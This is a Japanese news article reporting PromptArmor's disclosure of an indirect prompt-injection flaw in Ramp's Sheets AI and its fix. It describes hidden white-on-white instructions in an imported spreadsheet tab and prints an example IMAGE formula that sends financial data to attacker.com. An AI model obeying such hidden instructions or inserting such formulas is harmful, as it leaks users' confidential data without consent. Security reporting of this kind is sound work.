Ramp Labsが提供する表計算AI「Sheets AI」に、ユーザーの承認なしで機密性の高い財務データを外部サーバーへ送信できてしまう脆弱(ぜいじゃく)性が存在していたことを、AIセキュリティ企業PromptArmorが報告しました。Rampのセキュリティチームは、2026年3月16日に問題を解決したと説明しています。
Ramp’s Sheets AI Exfiltrates Financials
https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials
Ramp Sheets AIは、スプレッドシート上でセルの編集や数式の挿入を自動で行うエージェント型AI機能です。Excel上で動作するClaude for Excelに近い製品で、ユーザーが毎回確認しなくてもAIが表計算ファイルを編集できる点が特徴です。
PromptArmorによると、問題の原因はRamp Sheets AIが外部通信を発生させる数式をユーザー承認なしで挿入できた点にあります。外部通信とは、スプレッドシート内の関数がインターネット上のサーバーへアクセスする動作です。URLに機密情報を含めると、アクセス先のサーバーに機密情報が送られてしまいます。
PromptArmorは攻撃を実演する様子もブログに投稿しています。まず、ユーザーが機密の財務情報をRamp Sheets AIで開きます。
次に業界成長率の統計データを別タブとして読み込みます。業界統計は、ウェブサイト、メール、共有ドライブなどから入手した外部資料という想定です。
攻撃者は、業界統計のスプレッドシート内に「間接プロンプトインジェクション」を隠していました。間接プロンプトインジェクションとは、外部資料に紛れ込ませた命令文でAIの動作を操る攻撃です。実演では白い背景に白い文字で命令文が書かれており、人間には見えにくい一方で、AIはセル内の文字列として読み取れます。
隠された命令文は、Ramp Sheets AIに対して、機密データを集めること、機密データを含む外部通信用の数式を作ること、作成した数式をスプレッドシートへ自動挿入することを指示していました。ユーザーが「財務モデルと業界統計を比較してほしい」と依頼すると、Ramp Sheets AIが無害な依頼と一緒に隠し命令文まで処理して悪意あるIMAGE関数を挿入してしまいます。
IMAGE関数は本来、指定したURLの画像を表に表示する関数です。しかし、URLの末尾に財務データを付け加えると、画像取得の通信時に財務データが攻撃者のサーバーへ送られます。
挿入された数式は、次のような形式でした。
=IMAGE("https://attacker.com/visualize.png?{被害者の機密財務データ}")
攻撃者のサーバーにはアクセスログが残るため、攻撃者はログを見るだけで売上や財務指標などの情報を取得できます。ユーザーは業界統計との比較を依頼しただけであり、外部サーバーへの送信を許可していない点が特に危険です。
PromptArmorは2026年2月19日にRampへ脆弱性を報告し、2月27日と3月13日に追加連絡を行いました。Rampは3月14日に報告の受領を確認し、3月16日に問題を解決したとPromptArmorへ伝えました。
なお、PromptArmorはClaude for Excelでも似たリスクを確認していました。Claude for Excelには人間による承認手順がありましたが、悪意ある数式が承認画面で十分に見えなかったため、危険性を判断しにくい状態でした。Anthropicはその後、外部通信を発生させる可能性がある数式を挿入する際に赤い警告画面を表示し、挿入される数式全文を見せるように改善したとのことです。
この記事のタイトルとURLをコピーする
ソース元はコチラ
この記事は役に立ちましたか?
もし参考になりましたら、下記のボタンで教えてください。